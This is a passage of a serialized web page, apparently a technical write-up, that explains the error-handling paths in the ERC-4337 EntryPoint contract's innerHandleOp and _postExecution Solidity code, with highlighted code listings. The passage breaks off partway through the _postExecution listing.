nnerCall, ",{"type":27,"tag":207,"props":112269,"children":112270},{"style":232},[112271],{"type":33,"value":112272},"0x20",{"type":27,"tag":207,"props":112274,"children":112275},{"style":238},[112276],{"type":33,"value":22452},{"type":27,"tag":207,"props":112278,"children":112279},{"style":1335},[112280],{"type":33,"value":112281},"mload",{"type":27,"tag":207,"props":112283,"children":112284},{"style":238},[112285],{"type":33,"value":112286},"(innerCall), ",{"type":27,"tag":207,"props":112288,"children":112289},{"style":232},[112290],{"type":33,"value":1660},{"type":27,"tag":207,"props":112292,"children":112293},{"style":238},[112294],{"type":33,"value":1123},{"type":27,"tag":207,"props":112296,"children":112297},{"style":232},[112298],{"type":33,"value":7139},{"type":27,"tag":207,"props":112300,"children":112301},{"style":238},[112302],{"type":33,"value":10449},{"type":27,"tag":207,"props":112304,"children":112305},{"class":209,"line":5530},[112306,112311,112315,112320,112324,112328],{"type":27,"tag":207,"props":112307,"children":112308},{"style":238},[112309],{"type":33,"value":112310}," collected ",{"type":27,"tag":207,"props":112312,"children":112313},{"style":226},[112314],{"type":33,"value":28879},{"type":27,"tag":207,"props":112316,"children":112317},{"style":1335},[112318],{"type":33,"value":112319}," mload",{"type":27,"tag":207,"props":112321,"children":112322},{"style":238},[112323],{"type":33,"value":1343},{"type":27,"tag":207,"props":112325,"children":112326},{"style":232},[112327],{"type":33,"value":1660},{"type":27,"tag":207,"props":112329,"children":112330},{"style":238},[112331],{"type":33,"value":10449},{"type":27,"tag":207,"props":112333,"children":112334},{"class":209,"line":7900},[112335],{"type":27,"tag":207,"props":112336,"children":112337},{"style":238},[112338],{"type":33,"value":66118},{"type":27,"tag":207,"props":112340,"children":112341},{"class":209,"line":7909},[112342,112347],{"type":27,"tag":207,"props":112343,"children":112344},{"style":1335},[112345],{"type":33,"value":112346}," _restoreFreePtr",{"type":27,"tag":207,"props":112348,"children":112349},{"style":238},[112350],{"type":33,"value":112351},"(saveFreePtr);\n",{"type":27,"tag":207,"props":112353,"children":112354},{"class":209,"line":7917},[112355],{"type":27,"tag":207,"props":112356,"children":112357},{"style":238},[112358],{"type":33,"value":10637},{"type":27,"tag":207,"props":112360,"children":112361},{"class":209,"line":7926},[112362,112366,112370,112374],{"type":27,"tag":207,"props":112363,"children":112364},{"style":376},[112365],{"type":33,"value":10562},{"type":27,"tag":207,"props":112367,"children":112368},{"style":238},[112369],{"type":33,"value":686},{"type":27,"tag":207,"props":112371,"children":112372},{"style":226},[112373],{"type":33,"value":27893},{"type":27,"tag":207,"props":112375,"children":112376},{"style":238},[112377],{"type":33,"value":112378},"success) {\n",{"type":27,"tag":207,"props":112380,"children":112381},{"class":209,"line":7934},[112382],{"type":27,"tag":207,"props":112383,"children":112384},{"style":238},[112385],{"type":33,"value":112006},{"type":27,"tag":207,"props":112387,"children":112388},{"class":209,"line":7943},[112389,112393,112398,112402],{"type":27,"tag":207,"props":112390,"children":112391},{"style":376},[112392],{"type":33,"value":66034},{"type":27,"tag":207,"props":112394,"children":112395},{"style":238},[112396],{"type":33,"value":112397}," (innerRevertCode ",{"type":27,"tag":207,"props":112399,"children":112400},{"style":226},[112401],{"type":33,"value":15856},{"type":27,"tag":207,"props":112403,"children":112404},{"style":238},[112405],{"type":33,"value":112406}," INNER_OUT_OF_GAS) {\n",{"type":27,"tag":207,"props":112408,"children":112409},{"class":209,"line":7952},[112410],{"type":27,"tag":207,"props":112411,"children":112412},{"style":4647},[112413],{"type":33,"value":112414}," // handleOps was called with gas limit too low. abort entire bundle.\n",{"type":27,"tag":207,"props":112416,"children":112417},{"class":209,"line":7961},[112418],{"type":27,"tag":207,"props":112419,"children":112420},{"style":4647},[112421],{"type":33,"value":112422}," // can only be caused by bundler (leaving not enough gas for inner call)\n",{"type":27,"tag":207,"props":112424,"children":112425},{"class":209,"line":7969},[112426,112431,112436,112441,112446],{"type":27,"tag":207,"props":112427,"children":112428},{"style":376},[112429],{"type":33,"value":112430}," revert",{"type":27,"tag":207,"props":112432,"children":112433},{"style":1335},[112434],{"type":33,"value":112435}," FailedOp",{"type":27,"tag":207,"props":112437,"children":112438},{"style":238},[112439],{"type":33,"value":112440},"(opIndex, ",{"type":27,"tag":207,"props":112442,"children":112443},{"style":1325},[112444],{"type":33,"value":112445},"\"AA95 out of gas\"",{"type":27,"tag":207,"props":112447,"children":112448},{"style":238},[112449],{"type":33,"value":1455},{"type":27,"tag":207,"props":112451,"children":112452},{"class":209,"line":7978},[112453,112457,112461,112465,112469,112473],{"type":27,"tag":207,"props":112454,"children":112455},{"style":238},[112456],{"type":33,"value":77827},{"type":27,"tag":207,"props":112458,"children":112459},{"style":376},[112460],{"type":33,"value":10605},{"type":27,"tag":207,"props":112462,"children":112463},{"style":376},[112464],{"type":33,"value":23063},{"type":27,"tag":207,"props":112466,"children":112467},{"style":238},[112468],{"type":33,"value":112397},{"type":27,"tag":207,"props":112470,"children":112471},{"style":226},[112472],{"type":33,"value":15856},{"type":27,"tag":207,"props":112474,"children":112475},{"style":238},[112476],{"type":33,"value":112477}," INNER_REVERT_LOW_PREFUND) {\n",{"type":27,"tag":207,"props":112479,"children":112480},{"class":209,"line":7987},[112481],{"type":27,"tag":207,"props":112482,"children":112483},{"style":4647},[112484],{"type":33,"value":112485}," // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n",{"type":27,"tag":207,"props":112487,"children":112488},{"class":209,"line":7996},[112489,112493,112498,112502,112507,112511,112516,112520,112524],{"type":27,"tag":207,"props":112490,"children":112491},{"style":8920},[112492],{"type":33,"value":110667},{"type":27,"tag":207,"props":112494,"children":112495},{"style":238},[112496],{"type":33,"value":112497}," actualGas ",{"type":27,"tag":207,"props":112499,"children":112500},{"style":226},[112501],{"type":33,"value":10380},{"type":27,"tag":207,"props":112503,"children":112504},{"style":238},[112505],{"type":33,"value":112506}," preGas ",{"type":27,"tag":207,"props":112508,"children":112509},{"style":226},[112510],{"type":33,"value":11611},{"type":27,"tag":207,"props":112512,"children":112513},{"style":214},[112514],{"type":33,"value":112515}," gasleft",{"type":27,"tag":207,"props":112517,"children":112518},{"style":238},[112519],{"type":33,"value":21319},{"type":27,"tag":207,"props":112521,"children":112522},{"style":226},[112523],{"type":33,"value":2227},{"type":27,"tag":207,"props":112525,"children":112526},{"style":238},[112527],{"type":33,"value":112528}," opInfo.preOpGas;\n",{"type":27,"tag":207,"props":112530,"children":112531},{"class":209,"line":8005},[112532,112536,112540,112544],{"type":27,"tag":207,"props":112533,"children":112534},{"style":8920},[112535],{"type":33,"value":110667},{"type":27,"tag":207,"props":112537,"children":112538},{"style":238},[112539],{"type":33,"value":111314},{"type":27,"tag":207,"props":112541,"children":112542},{"style":226},[112543],{"type":33,"value":10380},{"type":27,"tag":207,"props":112545,"children":112546},{"style":238},[112547],{"type":33,"value":112548}," opInfo.prefund;\n",{"type":27,"tag":207,"props":112550,"children":112551},{"class":209,"line":8013},[112552,112557],{"type":27,"tag":207,"props":112553,"children":112554},{"style":1335},[112555],{"type":33,"value":112556}," _emitPrefundTooLow",{"type":27,"tag":207,"props":112558,"children":112559},{"style":238},[112560],{"type":33,"value":112561},"(opInfo);\n",{"type":27,"tag":207,"props":112563,"children":112564},{"class":209,"line":8021},[112565,112570,112575,112579],{"type":27,"tag":207,"props":112566,"children":112567},{"style":1335},[112568],{"type":33,"value":112569}," _emitUserOperationEvent",{"type":27,"tag":207,"props":112571,"children":112572},{"style":238},[112573],{"type":33,"value":112574},"(opInfo, ",{"type":27,"tag":207,"props":112576,"children":112577},{"style":214},[112578],{"type":33,"value":15456},{"type":27,"tag":207,"props":112580,"children":112581},{"style":238},[112582],{"type":33,"value":112583},", actualGasCost, actualGas);\n",{"type":27,"tag":207,"props":112585,"children":112586},{"class":209,"line":8029},[112587,112591,112595],{"type":27,"tag":207,"props":112588,"children":112589},{"style":238},[112590],{"type":33,"value":112310},{"type":27,"tag":207,"props":112592,"children":112593},{"style":226},[112594],{"type":33,"value":10380},{"type":27,"tag":207,"props":112596,"children":112597},{"style":238},[112598],{"type":33,"value":112599}," actualGasCost;\n",{"type":27,"tag":207,"props":112601,"children":112602},{"class":209,"line":8037},[112603,112607,112611],{"type":27,"tag":207,"props":112604,"children":112605},{"style":238},[112606],{"type":33,"value":77827},{"type":27,"tag":207,"props":112608,"children":112609},{"style":376},[112610],{"type":33,"value":10605},{"type":27,"tag":207,"props":112612,"children":112613},{"style":238},[112614],{"type":33,"value":384},{"type":27,"tag":207,"props":112616,"children":112617},{"class":209,"line":8046},[112618],{"type":27,"tag":207,"props":112619,"children":112620},{"style":238},[112621],{"type":33,"value":112006},{"type":27,"tag":207,"props":112623,"children":112624},{"class":209,"line":8055},[112625,112629,112633,112638],{"type":27,"tag":207,"props":112626,"children":112627},{"style":238},[112628],{"type":33,"value":112310},{"type":27,"tag":207,"props":112630,"children":112631},{"style":226},[112632],{"type":33,"value":10380},{"type":27,"tag":207,"props":112634,"children":112635},{"style":1335},[112636],{"type":33,"value":112637}," _postExecution",{"type":27,"tag":207,"props":112639,"children":112640},{"style":238},[112641],{"type":33,"value":9090},{"type":27,"tag":207,"props":112643,"children":112644},{"class":209,"line":8064},[112645],{"type":27,"tag":207,"props":112646,"children":112647},{"style":238},[112648],{"type":33,"value":112649}," IPaymaster.PostOpMode.postOpReverted,\n",{"type":27,"tag":207,"props":112651,"children":112652},{"class":209,"line":8072},[112653],{"type":27,"tag":207,"props":112654,"children":112655},{"style":238},[112656],{"type":33,"value":112657}," opInfo,\n",{"type":27,"tag":207,"props":112659,"children":112660},{"class":209,"line":8081},[112661],{"type":27,"tag":207,"props":112662,"children":112663},{"style":238},[112664],{"type":33,"value":112665}," context,\n",{"type":27,"tag":207,"props":112667,"children":112668},{"class":209,"line":8090},[112669],{"type":27,"tag":207,"props":112670,"children":112671},{"style":238},[112672],{"type":33,"value":112673}," actualGas\n",{"type":27,"tag":207,"props":112675,"children":112676},{"class":209,"line":8098},[112677],{"type":27,"tag":207,"props":112678,"children":112679},{"style":238},[112680],{"type":33,"value":112681}," );\n",{"type":27,"tag":207,"props":112683,"children":112684},{"class":209,"line":8107},[112685],{"type":27,"tag":207,"props":112686,"children":112687},{"style":238},[112688],{"type":33,"value":66118},{"type":27,"tag":207,"props":112690,"children":112691},{"class":209,"line":8116},[112692],{"type":27,"tag":207,"props":112693,"children":112694},{"style":238},[112695],{"type":33,"value":10637},{"type":27,"tag":207,"props":112697,"children":112698},{"class":209,"line":8125},[112699],{"type":27,"tag":207,"props":112700,"children":112701},{"style":238},[112702],{"type":33,"value":10645},{"type":27,"tag":36,"props":112704,"children":112705},{},[112706,112708,112713,112715,112721,112723,112729,112731,112737],{"type":33,"value":112707},"During execution, the ",{"type":27,"tag":84,"props":112709,"children":112711},{"className":112710},[],[112712],{"type":33,"value":109470},{"type":33,"value":112714}," contract makes a ",{"type":27,"tag":47,"props":112716,"children":112719},{"href":112717,"rel":112718},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L222-L232",[51],[112720],{"type":33,"value":45542},{"type":33,"value":112722}," to its own ",{"type":27,"tag":84,"props":112724,"children":112726},{"className":112725},[],[112727],{"type":33,"value":112728},"innerHandleOp",{"type":33,"value":112730}," function through a low-level ",{"type":27,"tag":84,"props":112732,"children":112734},{"className":112733},[],[112735],{"type":33,"value":112736},"call()",{"type":33,"value":112738},". This is done to create a new call context for executing the user operation.",{"type":27,"tag":36,"props":112740,"children":112741},{},[112742,112744,112750,112751,112756,112758,112765,112767,112773],{"type":33,"value":112743},"If this call fails (when ",{"type":27,"tag":84,"props":112745,"children":112747},{"className":112746},[],[112748],{"type":33,"value":112749},"success",{"type":33,"value":12784},{"type":27,"tag":84,"props":112752,"children":112754},{"className":112753},[],[112755],{"type":33,"value":15456},{"type":33,"value":112757},"), the code enters an ",{"type":27,"tag":47,"props":112759,"children":112762},{"href":112760,"rel":112761},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L235-L273",[51],[112763],{"type":33,"value":112764},"error handling",{"type":33,"value":112766}," flow that checks the ",{"type":27,"tag":84,"props":112768,"children":112770},{"className":112769},[],[112771],{"type":33,"value":112772},"innerRevertCode",{"type":33,"value":112774},". There are three possible paths:",{"type":27,"tag":12719,"props":112776,"children":112777},{},[112778,112802,112820],{"type":27,"tag":1232,"props":112779,"children":112780},{},[112781,112782,112787,112788,112794,112796,112801],{"type":33,"value":14762},{"type":27,"tag":84,"props":112783,"children":112785},{"className":112784},[],[112786],{"type":33,"value":112772},{"type":33,"value":12784},{"type":27,"tag":84,"props":112789,"children":112791},{"className":112790},[],[112792],{"type":33,"value":112793},"INNER_OUT_OF_GAS",{"type":33,"value":112795},", it means the bundler didn't provide enough gas for execution. This causes the entire bundle to fail with ",{"type":27,"tag":84,"props":112797,"children":112799},{"className":112798},[],[112800],{"type":33,"value":112445},{"type":33,"value":1041},{"type":27,"tag":1232,"props":112803,"children":112804},{},[112805,112806,112811,112812,112818],{"type":33,"value":14762},{"type":27,"tag":84,"props":112807,"children":112809},{"className":112808},[],[112810],{"type":33,"value":112772},{"type":33,"value":12784},{"type":27,"tag":84,"props":112813,"children":112815},{"className":112814},[],[112816],{"type":33,"value":112817},"INNER_REVERT_LOW_PREFUND",{"type":33,"value":112819},", it means the user didn't prefund enough gas. In this case, it charges the entire prefund amount as gas cost.",{"type":27,"tag":1232,"props":112821,"children":112822},{},[112823,112825,112831,112833,112839],{"type":33,"value":112824},"For any other revert reason, the code will still call ",{"type":27,"tag":84,"props":112826,"children":112828},{"className":112827},[],[112829],{"type":33,"value":112830},"_postExecution()",{"type":33,"value":112832}," but with ",{"type":27,"tag":84,"props":112834,"children":112836},{"className":112835},[],[112837],{"type":33,"value":112838},"PostOpMode.postOpReverted",{"type":33,"value":112840},". This ensures proper cleanup happens even on failure.",{"type":27,"tag":36,"props":112842,"children":112843},{},[112844,112846,112851,112853,112858,112860,112865,112867,112872],{"type":33,"value":112845},"We're particularly interested in the third error path, where ",{"type":27,"tag":84,"props":112847,"children":112849},{"className":112848},[],[112850],{"type":33,"value":112772},{"type":33,"value":112852}," is neither ",{"type":27,"tag":84,"props":112854,"children":112856},{"className":112855},[],[112857],{"type":33,"value":112793},{"type":33,"value":112859}," nor ",{"type":27,"tag":84,"props":112861,"children":112863},{"className":112862},[],[112864],{"type":33,"value":112817},{"type":33,"value":112866},". To understand this case better, let's examine how ",{"type":27,"tag":84,"props":112868,"children":112870},{"className":112869},[],[112871],{"type":33,"value":112728},{"type":33,"value":112873}," works.",{"type":27,"tag":101,"props":112875,"children":112877},{"className":11758,"code":112876,"language":11757,"meta":7,"style":7}," function innerHandleOp(\n bytes memory callData,\n UserOpInfo memory opInfo,\n bytes calldata context\n ) external returns (uint256 actualGasCost) {\n [...]\n IPaymaster.PostOpMode mode = IPaymaster.PostOpMode.opSucceeded;\n if (callData.length > 0) {\n bool success = Exec.call(mUserOp.sender, 0, callData, callGasLimit);\n if (!success) {\n uint256 freePtr = _getFreePtr();\n bytes memory result = Exec.getReturnData(REVERT_REASON_MAX_LEN);\n if (result.length > 0) {\n emit UserOperationRevertReason(\n opInfo.userOpHash,\n mUserOp.sender,\n mUserOp.nonce,\n result\n );\n }\n _restoreFreePtr(freePtr);\n mode = IPaymaster.PostOpMode.opReverted;\n }\n }\n\n unchecked {\n uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n return _postExecution(mode, opInfo, context, actualGas);\n }\n }\n",[112878],{"type":27,"tag":84,"props":112879,"children":112880},{"__ignoreMap":7},[112881,112897,112918,112938,112954,112987,112994,113011,113035,113075,113094,113119,113153,113177,113194,113202,113210,113218,113226,113234,113241,113254,113271,113278,113285,113292,113303,113342,113358,113365],{"type":27,"tag":207,"props":112882,"children":112883},{"class":209,"line":210},[112884,112888,112893],{"type":27,"tag":207,"props":112885,"children":112886},{"style":214},[112887],{"type":33,"value":97050},{"type":27,"tag":207,"props":112889,"children":112890},{"style":1335},[112891],{"type":33,"value":112892}," innerHandleOp",{"type":27,"tag":207,"props":112894,"children":112895},{"style":238},[112896],{"type":33,"value":9090},{"type":27,"tag":207,"props":112898,"children":112899},{"class":209,"line":244},[112900,112905,112909,112914],{"type":27,"tag":207,"props":112901,"children":112902},{"style":8920},[112903],{"type":33,"value":112904}," bytes",{"type":27,"tag":207,"props":112906,"children":112907},{"style":214},[112908],{"type":33,"value":110287},{"type":27,"tag":207,"props":112910,"children":112911},{"style":220},[112912],{"type":33,"value":112913}," callData",{"type":27,"tag":207,"props":112915,"children":112916},{"style":238},[112917],{"type":33,"value":1842},{"type":27,"tag":207,"props":112919,"children":112920},{"class":209,"line":270},[112921,112925,112929,112934],{"type":27,"tag":207,"props":112922,"children":112923},{"style":214},[112924],{"type":33,"value":111945},{"type":27,"tag":207,"props":112926,"children":112927},{"style":214},[112928],{"type":33,"value":110287},{"type":27,"tag":207,"props":112930,"children":112931},{"style":220},[112932],{"type":33,"value":112933}," opInfo",{"type":27,"tag":207,"props":112935,"children":112936},{"style":238},[112937],{"type":33,"value":1842},{"type":27,"tag":207,"props":112939,"children":112940},{"class":209,"line":296},[112941,112945,112949],{"type":27,"tag":207,"props":112942,"children":112943},{"style":8920},[112944],{"type":33,"value":112904},{"type":27,"tag":207,"props":112946,"children":112947},{"style":214},[112948],{"type":33,"value":110219},{"type":27,"tag":207,"props":112950,"children":112951},{"style":220},[112952],{"type":33,"value":112953}," context\n",{"type":27,"tag":207,"props":112955,"children":112956},{"class":209,"line":445},[112957,112962,112967,112971,112975,112979,112983],{"type":27,"tag":207,"props":112958,"children":112959},{"style":238},[112960],{"type":33,"value":112961}," ) ",{"type":27,"tag":207,"props":112963,"children":112964},{"style":214},[112965],{"type":33,"value":112966},"external",{"type":27,"tag":207,"props":112968,"children":112969},{"style":376},[112970],{"type":33,"value":83226},{"type":27,"tag":207,"props":112972,"children":112973},{"style":238},[112974],{"type":33,"value":686},{"type":27,"tag":207,"props":112976,"children":112977},{"style":8920},[112978],{"type":33,"value":53410},{"type":27,"tag":207,"props":112980,"children":112981},{"style":220},[112982],{"type":33,"value":111028},{"type":27,"tag":207,"props":112984,"children":112985},{"style":238},[112986],{"type":33,"value":1424},{"type":27,"tag":207,"props":112988,"children":112989},{"class":209,"line":867},[112990],{"type":27,"tag":207,"props":112991,"children":112992},{"style":238},[112993],{"type":33,"value":112006},{"type":27,"tag":207,"props":112995,"children":112996},{"class":209,"line":892},[112997,113002,113006],{"type":27,"tag":207,"props":112998,"children":112999},{"style":238},[113000],{"type":33,"value":113001}," IPaymaster.PostOpMode mode ",{"type":27,"tag":207,"props":113003,"children":113004},{"style":226},[113005],{"type":33,"value":10380},{"type":27,"tag":207,"props":113007,"children":113008},{"style":238},[113009],{"type":33,"value":113010}," IPaymaster.PostOpMode.opSucceeded;\n",{"type":27,"tag":207,"props":113012,"children":113013},{"class":209,"line":1475},[113014,113018,113023,113027,113031],{"type":27,"tag":207,"props":113015,"children":113016},{"style":376},[113017],{"type":33,"value":10562},{"type":27,"tag":207,"props":113019,"children":113020},{"style":238},[113021],{"type":33,"value":113022}," (callData.length ",{"type":27,"tag":207,"props":113024,"children":113025},{"style":226},[113026],{"type":33,"value":17739},{"type":27,"tag":207,"props":113028,"children":113029},{"style":232},[113030],{"type":33,"value":4680},{"type":27,"tag":207,"props":113032,"children":113033},{"style":238},[113034],{"type":33,"value":1424},{"type":27,"tag":207,"props":113036,"children":113037},{"class":209,"line":2065},[113038,113043,113048,113052,113057,113061,113066,113070],{"type":27,"tag":207,"props":113039,"children":113040},{"style":8920},[113041],{"type":33,"value":113042}," bool",{"type":27,"tag":207,"props":113044,"children":113045},{"style":238},[113046],{"type":33,"value":113047}," success ",{"type":27,"tag":207,"props":113049,"children":113050},{"style":226},[113051],{"type":33,"value":10380},{"type":27,"tag":207,"props":113053,"children":113054},{"style":238},[113055],{"type":33,"value":113056}," Exec.",{"type":27,"tag":207,"props":113058,"children":113059},{"style":1335},[113060],{"type":33,"value":45542},{"type":27,"tag":207,"props":113062,"children":113063},{"style":238},[113064],{"type":33,"value":113065},"(mUserOp.sender, ",{"type":27,"tag":207,"props":113067,"children":113068},{"style":232},[113069],{"type":33,"value":1660},{"type":27,"tag":207,"props":113071,"children":113072},{"style":238},[113073],{"type":33,"value":113074},", callData, callGasLimit);\n",{"type":27,"tag":207,"props":113076,"children":113077},{"class":209,"line":2092},[113078,113082,113086,113090],{"type":27,"tag":207,"props":113079,"children":113080},{"style":376},[113081],{"type":33,"value":66034},{"type":27,"tag":207,"props":113083,"children":113084},{"style":238},[113085],{"type":33,"value":686},{"type":27,"tag":207,"props":113087,"children":113088},{"style":226},[113089],{"type":33,"value":27893},{"type":27,"tag":207,"props":113091,"children":113092},{"style":238},[113093],{"type":33,"value":112378},{"type":27,"tag":207,"props":113095,"children":113096},{"class":209,"line":2130},[113097,113101,113106,113110,113115],{"type":27,"tag":207,"props":113098,"children":113099},{"style":8920},[113100],{"type":33,"value":110667},{"type":27,"tag":207,"props":113102,"children":113103},{"style":238},[113104],{"type":33,"value":113105}," freePtr ",{"type":27,"tag":207,"props":113107,"children":113108},{"style":226},[113109],{"type":33,"value":10380},{"type":27,"tag":207,"props":113111,"children":113112},{"style":1335},[113113],{"type":33,"value":113114}," _getFreePtr",{"type":27,"tag":207,"props":113116,"children":113117},{"style":238},[113118],{"type":33,"value":4301},{"type":27,"tag":207,"props":113120,"children":113121},{"class":209,"line":2168},[113122,113126,113130,113135,113139,113143,113148],{"type":27,"tag":207,"props":113123,"children":113124},{"style":8920},[113125],{"type":33,"value":112062},{"type":27,"tag":207,"props":113127,"children":113128},{"style":214},[113129],{"type":33,"value":110287},{"type":27,"tag":207,"props":113131,"children":113132},{"style":238},[113133],{"type":33,"value":113134}," result ",{"type":27,"tag":207,"props":113136,"children":113137},{"style":226},[113138],{"type":33,"value":10380},{"type":27,"tag":207,"props":113140,"children":113141},{"style":238},[113142],{"type":33,"value":113056},{"type":27,"tag":207,"props":113144,"children":113145},{"style":1335},[113146],{"type":33,"value":113147},"getReturnData",{"type":27,"tag":207,"props":113149,"children":113150},{"style":238},[113151],{"type":33,"value":113152},"(REVERT_REASON_MAX_LEN);\n",{"type":27,"tag":207,"props":113154,"children":113155},{"class":209,"line":4095},[113156,113160,113165,113169,113173],{"type":27,"tag":207,"props":113157,"children":113158},{"style":376},[113159],{"type":33,"value":110727},{"type":27,"tag":207,"props":113161,"children":113162},{"style":238},[113163],{"type":33,"value":113164}," (result.length ",{"type":27,"tag":207,"props":113166,"children":113167},{"style":226},[113168],{"type":33,"value":17739},{"type":27,"tag":207,"props":113170,"children":113171},{"style":232},[113172],{"type":33,"value":4680},{"type":27,"tag":207,"props":113174,"children":113175},{"style":238},[113176],{"type":33,"value":1424},{"type":27,"tag":207,"props":113178,"children":113179},{"class":209,"line":4103},[113180,113185,113190],{"type":27,"tag":207,"props":113181,"children":113182},{"style":376},[113183],{"type":33,"value":113184}," emit",{"type":27,"tag":207,"props":113186,"children":113187},{"style":1335},[113188],{"type":33,"value":113189}," UserOperationRevertReason",{"type":27,"tag":207,"props":113191,"children":113192},{"style":238},[113193],{"type":33,"value":9090},{"type":27,"tag":207,"props":113195,"children":113196},{"class":209,"line":4154},[113197],{"type":27,"tag":207,"props":113198,"children":113199},{"style":238},[113200],{"type":33,"value":113201}," opInfo.userOpHash,\n",{"type":27,"tag":207,"props":113203,"children":113204},{"class":209,"line":4203},[113205],{"type":27,"tag":207,"props":113206,"children":113207},{"style":238},[113208],{"type":33,"value":113209}," mUserOp.sender,\n",{"type":27,"tag":207,"props":113211,"children":113212},{"class":209,"line":4249},[113213],{"type":27,"tag":207,"props":113214,"children":113215},{"style":238},[113216],{"type":33,"value":113217}," mUserOp.nonce,\n",{"type":27,"tag":207,"props":113219,"children":113220},{"class":209,"line":4290},[113221],{"type":27,"tag":207,"props":113222,"children":113223},{"style":238},[113224],{"type":33,"value":113225}," result\n",{"type":27,"tag":207,"props":113227,"children":113228},{"class":209,"line":4304},[113229],{"type":27,"tag":207,"props":113230,"children":113231},{"style":238},[113232],{"type":33,"value":113233}," );\n",{"type":27,"tag":207,"props":113235,"children":113236},{"class":209,"line":5466},[113237],{"type":27,"tag":207,"props":113238,"children":113239},{"style":238},[113240],{"type":33,"value":78304},{"type":27,"tag":207,"props":113242,"children":113243},{"class":209,"line":5530},[113244,113249],{"type":27,"tag":207,"props":113245,"children":113246},{"style":1335},[113247],{"type":33,"value":113248}," _restoreFreePtr",{"type":27,"tag":207,"props":113250,"children":113251},{"style":238},[113252],{"type":33,"value":113253},"(freePtr);\n",{"type":27,"tag":207,"props":113255,"children":113256},{"class":209,"line":7900},[113257,113262,113266],{"type":27,"tag":207,"props":113258,"children":113259},{"style":238},[113260],{"type":33,"value":113261}," mode ",{"type":27,"tag":207,"props":113263,"children":113264},{"style":226},[113265],{"type":33,"value":10380},{"type":27,"tag":207,"props":113267,"children":113268},{"style":238},[113269],{"type":33,"value":113270}," IPaymaster.PostOpMode.opReverted;\n",{"type":27,"tag":207,"props":113272,"children":113273},{"class":209,"line":7909},[113274],{"type":27,"tag":207,"props":113275,"children":113276},{"style":238},[113277],{"type":33,"value":66118},{"type":27,"tag":207,"props":113279,"children":113280},{"class":209,"line":7917},[113281],{"type":27,"tag":207,"props":113282,"children":113283},{"style":238},[113284],{"type":33,"value":10637},{"type":27,"tag":207,"props":113286,"children":113287},{"class":209,"line":7926},[113288],{"type":27,"tag":207,"props":113289,"children":113290},{"emptyLinePlaceholder":19},[113291],{"type":33,"value":2062},{"type":27,"tag":207,"props":113293,"children":113294},{"class":209,"line":7934},[113295,113299],{"type":27,"tag":207,"props":113296,"children":113297},{"style":376},[113298],{"type":33,"value":110323},{"type":27,"tag":207,"props":113300,"children":113301},{"style":238},[113302],{"type":33,"value":384},{"type":27,"tag":207,"props":113304,"children":113305},{"class":209,"line":7943},[113306,113310,113314,113318,113322,113326,113330,113334,113338],{"type":27,"tag":207,"props":113307,"children":113308},{"style":8920},[113309],{"type":33,"value":110335},{"type":27,"tag":207,"props":113311,"children":113312},{"style":238},[113313],{"type":33,"value":112497},{"type":27,"tag":207,"props":113315,"children":113316},{"style":226},[113317],{"type":33,"value":10380},{"type":27,"tag":207,"props":113319,"children":113320},{"style":238},[113321],{"type":33,"value":112506},{"type":27,"tag":207,"props":113323,"children":113324},{"style":226},[113325],{"type":33,"value":11611},{"type":27,"tag":207,"props":113327,"children":113328},{"style":214},[113329],{"type":33,"value":112515},{"type":27,"tag":207,"props":113331,"children":113332},{"style":238},[113333],{"type":33,"value":21319},{"type":27,"tag":207,"props":113335,"children":113336},{"style":226},[113337],{"type":33,"value":2227},{"type":27,"tag":207,"props":113339,"children":113340},{"style":238},[113341],{"type":33,"value":112528},{"type":27,"tag":207,"props":113343,"children":113344},{"class":209,"line":7952},[113345,113349,113353],{"type":27,"tag":207,"props":113346,"children":113347},{"style":376},[113348],{"type":33,"value":86307},{"type":27,"tag":207,"props":113350,"children":113351},{"style":1335},[113352],{"type":33,"value":112637},{"type":27,"tag":207,"props":113354,"children":113355},{"style":238},[113356],{"type":33,"value":113357},"(mode, opInfo, context, actualGas);\n",{"type":27,"tag":207,"props":113359,"children":113360},{"class":209,"line":7961},[113361],{"type":27,"tag":207,"props":113362,"children":113363},{"style":238},[113364],{"type":33,"value":10637},{"type":27,"tag":207,"props":113366,"children":113367},{"class":209,"line":7969},[113368],{"type":27,"tag":207,"props":113369,"children":113370},{"style":238},[113371],{"type":33,"value":10645},{"type":27,"tag":36,"props":113373,"children":113374},{},[113375,113377,113382,113384,113389,113391,113397,113399,113405,113407,113412,113414,113424],{"type":33,"value":113376},"We observe that, in the happy path, ",{"type":27,"tag":84,"props":113378,"children":113380},{"className":113379},[],[113381],{"type":33,"value":112728},{"type":33,"value":113383}," is expected to not only execute the actual ",{"type":27,"tag":84,"props":113385,"children":113387},{"className":113386},[],[113388],{"type":33,"value":109389},{"type":33,"value":113390}," call, but also call ",{"type":27,"tag":84,"props":113392,"children":113394},{"className":113393},[],[113395],{"type":33,"value":113396},"_postExecution",{"type":33,"value":113398},". This means that the third failure handling path, which passes ",{"type":27,"tag":84,"props":113400,"children":113402},{"className":113401},[],[113403],{"type":33,"value":113404},"postOpReverted",{"type":33,"value":113406}," as its mode, happens when something goes wrong with the ",{"type":27,"tag":84,"props":113408,"children":113410},{"className":113409},[],[113411],{"type":33,"value":113396},{"type":33,"value":113413}," call ",{"type":27,"tag":12606,"props":113415,"children":113416},{},[113417,113419],{"type":33,"value":113418},"inside ",{"type":27,"tag":84,"props":113420,"children":113422},{"className":113421},[],[113423],{"type":33,"value":112728},{"type":33,"value":1041},{"type":27,"tag":36,"props":113426,"children":113427},{},[113428,113430,113435],{"type":33,"value":113429},"Let's examine the ",{"type":27,"tag":84,"props":113431,"children":113433},{"className":113432},[],[113434],{"type":33,"value":113396},{"type":33,"value":113436}," code to understand where the revert might occur.",{"type":27,"tag":101,"props":113438,"children":113440},{"className":11758,"code":113439,"language":11757,"meta":7,"style":7}," function _postExecution(\n IPaymaster.PostOpMode mode,\n UserOpInfo memory opInfo,\n bytes memory context,\n uint256 actualGas\n ) internal virtual returns (uint256 actualGasCost) {\n [...]\n if (paymaster == address(0)) {\n refundAddress = mUserOp.sender;\n } else {\n refundAddress = paymaster;\n if (context.length > 0) {\n actualGasCost = actualGas * gasPrice;\n uint256 postOpPreGas = gasleft();\n if (mode != IPaymaster.PostOpMode.postOpReverted) {\n try IPaymaster(paymaster).postOp{\n gas: mUserOp.paymasterPostOpGasLimit\n }(mode, context, actualGasCost, gasPrice)\n // solhint-disable-next-line no-empty-blocks\n {} catch {\n bytes memory reason = 